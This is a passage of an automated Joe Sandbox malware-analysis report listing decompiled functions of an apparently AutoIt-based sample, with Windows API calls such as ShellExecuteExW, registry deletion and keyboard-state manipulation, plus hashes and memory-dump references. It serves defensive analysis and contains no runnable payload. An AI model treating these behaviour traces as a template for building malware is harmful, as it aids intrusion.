                                                                                                                                                                                • Part of subcall function 004D010A: std::exception::exception.LIBCMT ref: 004D013E
                                                                                                                                                                                • Part of subcall function 004D010A: __CxxThrowException@8.LIBCMT ref: 004D0153
                                                                                                                                                                              • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 004FA205
                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 004FA221
                                                                                                                                                                              • _memmove.LIBCMT ref: 004FA26F
                                                                                                                                                                              • _memmove.LIBCMT ref: 004FA28C
                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 004FA29B
                                                                                                                                                                              • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 004FA2B0
                                                                                                                                                                              • InterlockedExchange.KERNEL32(?,000001F6), ref: 004FA2CF
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 256516436-0
                                                                                                                                                                              • Opcode ID: c5bdd45decf0babccadcaf9f835aaff867ab2901848f53e0d8ba970fdf62b864
                                                                                                                                                                              • Instruction ID: 543d731446a1a0d36cd4473124dc78a0309cba1f023c6026ab1687dbd3ba68dd
                                                                                                                                                                              • Opcode Fuzzy Hash: c5bdd45decf0babccadcaf9f835aaff867ab2901848f53e0d8ba970fdf62b864
                                                                                                                                                                              • Instruction Fuzzy Hash: 9F31CE31A00105EBCB00DF95DC85AAFBBB8EF44310F1040AAF904AB346C775D918DBA5
                                                                                                                                                                              Function 00518CDB Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 00518CF3
                                                                                                                                                                              • GetDC.USER32(00000000), ref: 00518CFB
                                                                                                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00518D06
                                                                                                                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 00518D12
                                                                                                                                                                              • CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 00518D4E
                                                                                                                                                                              • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00518D5F
                                                                                                                                                                              • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0051BB29,?,?,000000FF,00000000,?,000000FF,?), ref: 00518D99
                                                                                                                                                                              • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00518DB9
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3864802216-0
                                                                                                                                                                              • Opcode ID: 8413626accba0e0329dffb5c8f68ccb2e6b40814420a69688708930a22fc81be
                                                                                                                                                                              • Instruction ID: ba1bc707c7fe2d0811eb37a07fdfcd6aa0839609be4e19580226d2b71cd5353d
                                                                                                                                                                              • Opcode Fuzzy Hash: 8413626accba0e0329dffb5c8f68ccb2e6b40814420a69688708930a22fc81be
                                                                                                                                                                              • Instruction Fuzzy Hash: 4D316B72200614BBEB208F50EC8AFEA3FB9EF59755F084055FE089A291DA759841DBB0
                                                                                                                                                                              Function 004CB40F Relevance: 10.7, APIs: 7, Instructions: 218COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 5d6c13809a69d485a9264ca59fae67ba5c9f2f937ebcddb7d64337b968c9f3f1
                                                                                                                                                                              • Instruction ID: 5031b81a3c7c5d7f33048ffa29b9daaae25c2013eba8242a485797ad78a122fc
                                                                                                                                                                              • Opcode Fuzzy Hash: 5d6c13809a69d485a9264ca59fae67ba5c9f2f937ebcddb7d64337b968c9f3f1
                                                                                                                                                                              • Instruction Fuzzy Hash: 4B716D75904109FFCB08CF98DC89EAEBB78FF85318F14815EF915A6251C7349A12CBA8
                                                                                                                                                                              Function 00512121 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 191COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • _memset.LIBCMT ref: 0051214B
                                                                                                                                                                              • _memset.LIBCMT ref: 00512214
                                                                                                                                                                              • ShellExecuteExW.SHELL32(?), ref: 00512259
                                                                                                                                                                                • Part of subcall function 004B84A6: __swprintf.LIBCMT ref: 004B84E5
                                                                                                                                                                                • Part of subcall function 004B84A6: __itow.LIBCMT ref: 004B8519
                                                                                                                                                                                • Part of subcall function 004B3BCF: _wcscpy.LIBCMT ref: 004B3BF2
                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00512320
                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 0051232F
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
                                                                                                                                                                              • String ID: @
                                                                                                                                                                              • API String ID: 4082843840-2766056989
                                                                                                                                                                              • Opcode ID: c6c1ff4cb654be304401e7584ca2691e7efe574bd7589b4c345f0ee5002de38b
                                                                                                                                                                              • Instruction ID: 36c53da3840b48fbbf1e30e4b8688e382f8a07e7b9ddc6364da5446b185cd1ed
                                                                                                                                                                              • Opcode Fuzzy Hash: c6c1ff4cb654be304401e7584ca2691e7efe574bd7589b4c345f0ee5002de38b
                                                                                                                                                                              • Instruction Fuzzy Hash: AA718B74A00619AFCB04EFA5C8919DEBBF5FF48314F00845EE856AB351DB34AD90CB94
                                                                                                                                                                              Function 004F47DE Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetParent.USER32(?), ref: 004F481D
                                                                                                                                                                              • GetKeyboardState.USER32(?), ref: 004F4832
                                                                                                                                                                              • SetKeyboardState.USER32(?), ref: 004F4893
                                                                                                                                                                              • PostMessageW.USER32(?,00000101,00000010,?), ref: 004F48C1
                                                                                                                                                                              • PostMessageW.USER32(?,00000101,00000011,?), ref: 004F48E0
                                                                                                                                                                              • PostMessageW.USER32(?,00000101,00000012,?), ref: 004F4926
                                                                                                                                                                              • PostMessageW.USER32(?,00000101,0000005B,?), ref: 004F4949
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 87235514-0
                                                                                                                                                                              • Opcode ID: 474bd004dcf7391843d27fbe55a7be4495f9418b66fc2566a728a7e675570c42
                                                                                                                                                                              • Instruction ID: 4f18ad4d3d56e3a2f9621ac4ae50685539b702ee4286077e3d41c9e41c450006
                                                                                                                                                                              • Opcode Fuzzy Hash: 474bd004dcf7391843d27fbe55a7be4495f9418b66fc2566a728a7e675570c42
                                                                                                                                                                              • Instruction Fuzzy Hash: 7251E5A06087D93DFB3652348C05FBB7EA95B86344F08858AE3D5469C3CADCEC88D764
                                                                                                                                                                              Function 004F45F9 Relevance: 10.7, APIs: 7, Instructions: 164windowCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetParent.USER32(00000000), ref: 004F4638
                                                                                                                                                                              • GetKeyboardState.USER32(?), ref: 004F464D
                                                                                                                                                                              • SetKeyboardState.USER32(?), ref: 004F46AE
                                                                                                                                                                              • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 004F46DA
                                                                                                                                                                              • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 004F46F7
                                                                                                                                                                              • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 004F473B
                                                                                                                                                                              • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 004F475C
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 87235514-0
                                                                                                                                                                              • Opcode ID: 77cf80bdf8e64910face753162a5f00122a25d9f275056bf24f21736315dd743
                                                                                                                                                                              • Instruction ID: 7495a74c62d22dcddc44920eb24e5b9345094dec13c0394c4d6ab8b86949283b
                                                                                                                                                                              • Opcode Fuzzy Hash: 77cf80bdf8e64910face753162a5f00122a25d9f275056bf24f21736315dd743
                                                                                                                                                                              • Instruction Fuzzy Hash: 775108A05047D93DFB3657248C45B77BFE99B86304F08448AE2D486AC2DB9CEC98D768
                                                                                                                                                                              Function 004F86AE Relevance: 10.6, APIs: 7, Instructions: 137timeCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: _wcsncpy$LocalTime
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2945705084-0
                                                                                                                                                                              • Opcode ID: a3c6430157660939f88053500201a75d98d8f4a9004f49db0c80faf002e16dd5
                                                                                                                                                                              • Instruction ID: 46ac5b1429e79ce5222b88d45555d428a6666edce3be2a6740618bc869e6dd10
                                                                                                                                                                              • Opcode Fuzzy Hash: a3c6430157660939f88053500201a75d98d8f4a9004f49db0c80faf002e16dd5
                                                                                                                                                                              • Instruction Fuzzy Hash: 4C418E65C1021875CF11FBA58C86ACFB7ACEF15314F50846BFA14F3221EA78E65187A9
                                                                                                                                                                              Function 00513C63 Relevance: 10.6, APIs: 7, Instructions: 100registryCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?), ref: 00513C92
                                                                                                                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00513CBC
                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 00513D71
                                                                                                                                                                                • Part of subcall function 00513C63: RegCloseKey.ADVAPI32(?), ref: 00513CD9
                                                                                                                                                                                • Part of subcall function 00513C63: FreeLibrary.KERNEL32(?), ref: 00513D2B
                                                                                                                                                                                • Part of subcall function 00513C63: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00513D4E
                                                                                                                                                                              • RegDeleteKeyW.ADVAPI32(?,?), ref: 00513D16
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 395352322-0
                                                                                                                                                                              • Opcode ID: 030ae1e96fc0eb4d704760fe33873fa75c60340ecff7250f2d8f29cb5c86078a
                                                                                                                                                                              • Instruction ID: 90d00dbef1f258d356bb83044a5af6c0d36d00cfcb0613de627d91ac8eb681bb
                                                                                                                                                                              • Opcode Fuzzy Hash: 030ae1e96fc0eb4d704760fe33873fa75c60340ecff7250f2d8f29cb5c86078a
                                                                                                                                                                              • Instruction Fuzzy Hash: B3310FB1901109BFEB159B94EC99EFEBBBCFF18344F000569E512A2150E6709F89DBB0
                                                                                                                                                                              Function 00518DD5 Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00518DF4
                                                                                                                                                                              • GetWindowLongW.USER32(00F1E108,000000F0), ref: 00518E27
                                                                                                                                                                              • GetWindowLongW.USER32(00F1E108,000000F0), ref: 00518E5C
                                                                                                                                                                              • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00518E8E
                                                                                                                                                                              • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00518EB8
                                                                                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00518EC9
                                                                                                                                                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00518EE3
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: LongWindow$MessageSend
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2178440468-0
                                                                                                                                                                              • Opcode ID: 755afdfe7a4de79dcdea76b425785f4ed537725421fade39ba667a51d2873ed3
                                                                                                                                                                              • Instruction ID: 5c61b17186be2adace49c901014454a938e3a5958bce6379b5e6a6acd1fa3f33
                                                                                                                                                                              • Opcode Fuzzy Hash: 755afdfe7a4de79dcdea76b425785f4ed537725421fade39ba667a51d2873ed3
                                                                                                                                                                              • Instruction Fuzzy Hash: 63313431600611AFEB20DF58EC85FA53BB9FB5A314F184264F5158B2B2CF71A884EB51
                                                                                                                                                                              Function 004F16F1 Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 004F1734
                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 004F175A
                                                                                                                                                                              • SysAllocString.OLEAUT32(00000000), ref: 004F175D
                                                                                                                                                                              • SysAllocString.OLEAUT32(?), ref: 004F177B
                                                                                                                                                                              • SysFreeString.OLEAUT32(?), ref: 004F1784
                                                                                                                                                                              • StringFromGUID2.OLE32(?,?,00000028), ref: 004F17A9
                                                                                                                                                                              • SysAllocString.OLEAUT32(?), ref: 004F17B7
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3761583154-0
                                                                                                                                                                              • Opcode ID: 23c2a8340e43310b3ad9f5ee827ee7e284de7afb782ae5dfbbf97cdfc0d7831e
                                                                                                                                                                              • Instruction ID: 2fadea502ceb8eb04a722a8b72cc972007782aeb19e3b2fd8f9b7605f0851af9
                                                                                                                                                                              • Opcode Fuzzy Hash: 23c2a8340e43310b3ad9f5ee827ee7e284de7afb782ae5dfbbf97cdfc0d7831e
                                                                                                                                                                              • Instruction Fuzzy Hash: 3D215175600219AF9B10EBA9DC88DBF73FCEB09360B408126FA19DB360D674EC459764
                                                                                                                                                                              Function 004F69F9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 93filestringCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 004B31B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 004B31DA
                                                                                                                                                                              • lstrcmpiW.KERNEL32(?,?), ref: 004F6A2B
                                                                                                                                                                              • _wcscmp.LIBCMT ref: 004F6A49
                                                                                                                                                                              • MoveFileW.KERNEL32(?,?), ref: 004F6A62
                                                                                                                                                                                • Part of subcall function 004F6D6D: GetFileAttributesW.KERNEL32(?,?,00000000), ref: 004F6DBA
                                                                                                                                                                                • Part of subcall function 004F6D6D: GetLastError.KERNEL32 ref: 004F6DC5
                                                                                                                                                                                • Part of subcall function 004F6D6D: CreateDirectoryW.KERNEL32(?,00000000), ref: 004F6DD9
                                                                                                                                                                              • _wcscat.LIBCMT ref: 004F6AA4
                                                                                                                                                                              • SHFileOperationW.SHELL32(?), ref: 004F6B0C
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: File$AttributesCreateDirectoryErrorFullLastMoveNameOperationPath_wcscat_wcscmplstrcmpi
                                                                                                                                                                              • String ID: \*.*
                                                                                                                                                                              • API String ID: 2323102230-1173974218
                                                                                                                                                                              • Opcode ID: c9b2de98afa09d618974997fb668f38175bb57cc1afa3e99a551187f1d15850b
                                                                                                                                                                              • Instruction ID: b8934dcb58b9fc261e35234c234f7cbfd861e7d1f9d49cb11c1eefe7682d87a8
                                                                                                                                                                              • Opcode Fuzzy Hash: c9b2de98afa09d618974997fb668f38175bb57cc1afa3e99a551187f1d15850b
                                                                                                                                                                              • Instruction Fuzzy Hash: EF313571C0021C6ACF50EFA4D845AEEB7B89F08304F5045DBE605E3251EB399B49CB68
                                                                                                                                                                              Function 004F2FCD Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: __wcsnicmp
                                                                                                                                                                              • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                                                                                                              • API String ID: 1038674560-2734436370
                                                                                                                                                                              • Opcode ID: 7f054f698b372888c620b5a275744d8a89b24079e9353385e53f2fa53e358ff4
                                                                                                                                                                              • Instruction ID: f8d8df30d326bfea62dea793448596f8f09991bbd9e5d3afc96de2e095a0420a
                                                                                                                                                                              • Opcode Fuzzy Hash: 7f054f698b372888c620b5a275744d8a89b24079e9353385e53f2fa53e358ff4
                                                                                                                                                                              • Instruction Fuzzy Hash: 74213A311045197AD230AA359D02FBB73A8AF55319F10402FFA4587389EFDD9E82D2AD
                                                                                                                                                                              Function 004F17C8 Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 004F180D
                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 004F1833
                                                                                                                                                                              • SysAllocString.OLEAUT32(00000000), ref: 004F1836
                                                                                                                                                                              • SysAllocString.OLEAUT32 ref: 004F1857
                                                                                                                                                                              • SysFreeString.OLEAUT32 ref: 004F1860
                                                                                                                                                                              • StringFromGUID2.OLE32(?,?,00000028), ref: 004F187A
                                                                                                                                                                              • SysAllocString.OLEAUT32(?), ref: 004F1888
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
